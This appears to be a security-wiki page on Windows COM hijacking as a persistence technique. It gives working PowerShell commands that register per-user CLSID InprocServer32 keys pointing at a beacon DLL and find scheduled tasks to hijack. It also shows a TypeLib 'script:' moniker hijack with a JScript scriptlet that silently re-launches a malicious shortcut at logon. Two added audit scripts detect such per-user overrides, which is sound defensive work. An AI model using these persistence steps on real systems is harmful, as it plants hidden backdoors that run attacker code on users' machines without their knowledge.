COM Hijacking
Searching for missing COM components
Because HKCU values can be modified by the user, COM hijacking can be used as a persistence technique. Using procmon it is easy to find COM registry keys that are being looked up but do not exist, which an attacker could create to persist. Filters:
- Operation is RegOpenKey.
- Result is NAME NOT FOUND.
- Path ends with InprocServer32.
Once you have decided which non-existent COM object to impersonate, execute the following commands. Be careful if you choose to impersonate a COM object that is loaded every few seconds, as that could be excessive.
```powershell
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
```
Hijackable Task Scheduler COM components
Windows Tasks use Custom Triggers to call COM objects, and because they are executed through the Task Scheduler, it is easier to predict when they will be triggered.
```powershell
# Show COM CLSIDs
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
    # Only COM-handler actions carry a ClassId
    if ($Task.Actions.ClassId -ne $null)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            # BUILTIN\Users: tasks that run in the context of a standard user
            $usersSid = "S-1-5-32-545"
            $usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
            if ($Task.Principal.GroupId -eq $usersGroup.Name)
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}
# Sample Output:
# Task Name: Example
# Task Path: \Microsoft\Windows\Example\
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]
```
Checking the output, you can pick one that is going to be executed every time a user logs in, for example.
Now, searching for the CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} in HKEY_CLASSES_ROOT\CLSID and in HKLM and HKCU, you will usually find that the value does not exist in HKCU.
```powershell
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
               ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
```
Then, you can simply create the HKCU entry, and every time the user logs in, your backdoor will be executed.
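From the defender's side, both the missing-CLSID and the Task Scheduler variants leave the same footprint: an InprocServer32 key under HKCU that shadows (or pre-empts) a machine-wide one. The following audit script is an added example, not part of the original page; it lists per-user COM servers that shadow an HKLM registration, point outside the Windows directory, reference a missing DLL, or match a CLSID used by a scheduled task action.

```powershell
# Added example: hunt for per-user COM InprocServer32 overrides. Run as the user being audited.

# CLSIDs referenced by scheduled task COM-handler actions (the hijack targets enumerated above)
$taskClsids = @{}
foreach ($t in Get-ScheduledTask) {
    foreach ($a in $t.Actions) {
        if ($a.ClassId) { $taskClsids[$a.ClassId.ToUpper()] = $t.TaskPath + $t.TaskName }
    }
}

$findings = foreach ($key in Get-ChildItem 'HKCU:\Software\Classes\CLSID' -ErrorAction SilentlyContinue) {
    $clsid  = $key.PSChildName
    $inproc = Get-ItemProperty -Path "$($key.PSPath)\InprocServer32" -ErrorAction SilentlyContinue
    if (-not $inproc) { continue }
    $dll = [Environment]::ExpandEnvironmentVariables([string]$inproc.'(default)')

    # HKCU wins over HKLM in the merged HKCR view, so a per-user key that also exists
    # machine-wide is exactly the shadowing a hijack relies on.
    $shadowsHklm = Test-Path "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32"
    $inSystem    = $dll -like "$env:SystemRoot\*"
    $missingFile = [string]::IsNullOrEmpty($dll) -or -not (Test-Path -LiteralPath $dll)
    $usedByTask  = $taskClsids.ContainsKey($clsid.ToUpper())

    if ($shadowsHklm -or -not $inSystem -or $missingFile -or $usedByTask) {
        [pscustomobject]@{
            CLSID       = $clsid
            Dll         = $dll
            ShadowsHKLM = $shadowsHklm
            OutsideSys  = -not $inSystem
            FileMissing = $missingFile
            Task        = if ($usedByTask) { $taskClsids[$clsid.ToUpper()] } else { '' }
        }
    }
}
$findings | Format-Table -AutoSize
```

Legitimate per-user COM servers (e.g. apps installed under AppData) will show up as OutsideSys, so treat the output as a triage list; ShadowsHKLM combined with Task is the strongest signal.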
COM TypeLib Hijacking (script: moniker persistence)
Type Libraries (TypeLib) describe COM interfaces and are loaded via LoadTypeLib(). When a COM server is instantiated, the OS may also load the associated TypeLib by consulting the registry keys under HKCR\TypeLib\{LIBID}. If the TypeLib path is replaced with a moniker, e.g. script:C:\...\evil.sct, Windows will execute the scriptlet when the TypeLib is resolved, giving stealthy persistence that is triggered whenever commonly used components are touched.
This has been observed against the Microsoft Web Browser control (frequently loaded by Internet Explorer, applications embedding WebBrowser, and even explorer.exe).
Steps (PowerShell)
- Identify the TypeLib (LIBID) used by a frequently used CLSID. Example CLSID commonly abused by malware chains: {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (Microsoft Web Browser).
```powershell
$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
# LIBID referenced by the CLSID, then the first registered TypeLib version
$libid = (Get-ItemProperty -Path "Registry::HKCR\CLSID\$clsid\TypeLib").'(default)'
$ver = (Get-ChildItem "Registry::HKCR\TypeLib\$libid" | Select-Object -First 1).PSChildName
"CLSID=$clsid LIBID=$libid VER=$ver"
```
- Point the per-user TypeLib path to a local scriptlet using a script: moniker (no admin rights required):
```powershell
$dest = 'C:\ProgramData\Udate_Srv.sct'
New-Item -Path "HKCU:\Software\Classes\TypeLib\$libid\$ver\0\win32" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\TypeLib\$libid\$ver\0\win32" -Name '(default)' -Value "script:$dest"
```
- Drop a minimal JScript .sct that re-launches your main payload (e.g. the .lnk used in the initial chain):
```xml
<?xml version="1.0"?>
<scriptlet>
  <registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/>
  <script language="JScript">
    <![CDATA[
      try {
        var sh = new ActiveXObject('WScript.Shell');
        // Re-launch the malicious LNK for persistence
        var cmd = 'cmd.exe /K set X=1&"C:\\ProgramData\\NDA\\NDA.lnk"';
        sh.Run(cmd, 0, false);
      } catch(e) {}
    ]]>
  </script>
</scriptlet>
```
- Trigger: opening IE, an application embedding the WebBrowser control, or even routine Explorer activity will load the TypeLib and execute the scriptlet, re-arming your chain at logon/reboot.
Cleanup
```powershell
# Remove the per-user TypeLib hijack
Remove-Item -Recurse -Force "HKCU:\Software\Classes\TypeLib\$libid\$ver" 2>$null
# Delete the dropped scriptlet
Remove-Item -Force 'C:\ProgramData\Udate_Srv.sct' 2>$null
```
Notes
- The same logic applies to other high-frequency COM components; always resolve the real LIBID from HKCR\CLSID\{CLSID}\TypeLib first.
- On 64-bit systems you can also populate the win64 subkey for 64-bit consumers.
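The detection counterpart of the TypeLib steps above is to inspect per-user TypeLib registrations for moniker paths. The script below is an added example (not from the page or the referenced research); it walks HKCU\Software\Classes\TypeLib, checks both win32 and win64 as the notes suggest, and flags paths that are monikers such as script:, that do not point at a real type library file, or whose LIBID and version also exist under HKLM.

```powershell
# Added example: audit per-user TypeLib registrations for script:-style moniker hijacks.
# Legitimate TypeLib paths point at a .tlb/.dll/.ocx/.exe, optionally with a "\<resource-id>" suffix.
$okPath = '\.(tlb|dll|ocx|exe)(\\\d+)?$'

$results = foreach ($libid in Get-ChildItem 'HKCU:\Software\Classes\TypeLib' -ErrorAction SilentlyContinue) {
    foreach ($ver in Get-ChildItem $libid.PSPath) {
        foreach ($arch in 'win32', 'win64') {
            $p = "$($ver.PSPath)\0\$arch"
            if (-not (Test-Path $p)) { continue }
            $path = [string](Get-ItemProperty $p).'(default)'

            # "script:", "java:", ... start with a scheme; a drive letter ("C:\") does not count
            $isMoniker = ($path -match '^[a-z]+:') -and ($path -notmatch '^[a-z]:\\')
            $hklm = "HKLM:\Software\Classes\TypeLib\$($libid.PSChildName)\$($ver.PSChildName)\0\$arch"

            [pscustomobject]@{
                LIBID       = $libid.PSChildName
                Version     = $ver.PSChildName
                Arch        = $arch
                Path        = $path
                Moniker     = $isMoniker
                NotTypeLib  = ($path -notmatch $okPath)
                ShadowsHKLM = (Test-Path $hklm)
            }
        }
    }
}
$results | Where-Object { $_.Moniker -or $_.NotTypeLib -or $_.ShadowsHKLM } | Format-Table -AutoSize
```

A Moniker hit is a near-certain hijack; ShadowsHKLM alone can also come from per-user installers, so verify the file the path points at before acting.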
References
- Hijack the TypeLib – New COM persistence technique (CICADA8)
- Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies